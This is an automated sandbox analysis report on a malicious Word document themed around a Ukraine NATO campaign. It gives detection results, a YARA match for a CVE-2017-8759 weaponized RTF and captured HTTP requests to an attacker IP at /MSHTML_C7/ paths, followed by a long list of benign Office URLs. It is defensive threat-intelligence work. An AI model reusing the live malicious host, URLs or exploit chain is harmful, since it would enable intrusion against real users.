Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Overview_of_UWCs_UkraineInNATO_campaign.docx.doc

Overview

General Information

Sample Name:Overview_of_UWCs_UkraineInNATO_campaign.docx.doc
Analysis ID:1266120
MD5:d227874863036b8e73a3894a19bd25a0
SHA1:2400b169ee2c38ac146c67408debc9b4fa4fca5f
SHA256:a61b2eafcf39715031357df6b01e85e0d1ea2e8ee1dfec241b114e18f7a1163f
Tags:74-50-94-156docdocxHUN
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Document Viewer accesses SMB path (likely to steal NTLM hashes or to download payload)
Opens network shares
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Potential document exploit detected (performs HTTP gets)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 5296 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • splwow64.exe (PID: 7060 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
afchunk.rtfINDICATOR_RTF_EXPLOIT_CVE_2017_8759_2detects CVE-2017-8759 weaponized RTF documents.ditekSHen
  • 0xa018:$clsid3: 4d73786d6c322e534158584d4c5265616465722e
  • 0x3eab:$ole2: D0CF11E0A1B11AE1
  • 0xa060:$ole2: d0cf11e0a1b11ae1
  • 0x26d6:$obj2: \objdata
  • 0x3e60:$obj2: \objdata
  • 0x2683:$obj3: \objupdate
  • 0x2678:$obj5: \objautlink
  • 0x3de2:$obj5: \objautlink

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: Overview_of_UWCs_UkraineInNATO_campaign.docx.docAvira: detected
Multi AV Scanner detection for submitted file
Source: Overview_of_UWCs_UkraineInNATO_campaign.docx.docReversingLabs: Detection: 29%
Source: Overview_of_UWCs_UkraineInNATO_campaign.docx.docVirustotal: Detection: 49%Perma Link
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.6:49708
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficTCP traffic: 192.168.2.6:49708 -> 74.50.94.156:80
Source: global trafficHTTP traffic detected: GET /MSHTML_C7/start.xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 74.50.94.156Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /MSHTML_C7/RFile.asp HTTP/1.1Accept: */*Referer: http://74.50.94.156/MSHTML_C7/start.xmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 74.50.94.156Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /MSHTML_C7/zip_k.asp?d=84.17.52.5_4f657_ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 74.50.94.156Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /MSHTML_C7/zip_k2.asp?d=84.17.52.5_4f657_ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 74.50.94.156Connection: Keep-AliveCookie: ASPSESSIONIDCSTDATTC=AADBNNGBMMLHHHBHDOHGHCFP
Source: global trafficHTTP traffic detected: GET /MSHTML_C7/zip_k3.asp?d=84.17.52.5_4f657_ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 74.50.94.156Connection: Keep-AliveCookie: ASPSESSIONIDCSTDATTC=AADBNNGBMMLHHHBHDOHGHCFP
Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
Source: ~WRS{D1A74FD9-95F0-4A7B-AE12-DD660EE646E9}.tmp.0.drString found in binary or memory: http://74.50.94.156/MSHTML_C7/start.xml
Source: ~WRF{23F61671-1248-4D9F-BE58-51806C7F80DF}.tmp.0.drString found in binary or memory: http://74.50.94.156/MSHTML_C7/start.xmlyX
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.aadrm.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.aadrm.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.cortana.ai
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.microsoftstream.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.office.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.officescripts.microsoftusercontent.com/api
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.onedrive.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://api.scheduler.
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://augloop.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designer-mobile
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://cdn.entity.
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://cdn.hubblecontent.osi.office.net/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://cdn.int.designerapp.osi.office.net/fonts
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://clients.config.office.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://clients.config.office.net/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://config.edge.skype.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://cortana.ai
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://cortana.ai/api
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://cr.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://d.docs.live.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://designerapp.officeapps.live.com/designerapp
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://dev.cortana.ai
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://devnull.onenote.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://directory.services.
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://ecs.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://ecs.office.com/config/v1/Designer
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://graph.windows.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://graph.windows.net/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://invites.office.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://lifecycle.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://login.microsoftonline.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://login.windows.local
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://make.powerautomate.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://management.azure.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://management.azure.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://messaging.action.office.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://messaging.engagement.office.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://messaging.office.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://ncus.contentsync.
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://officeapps.live.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
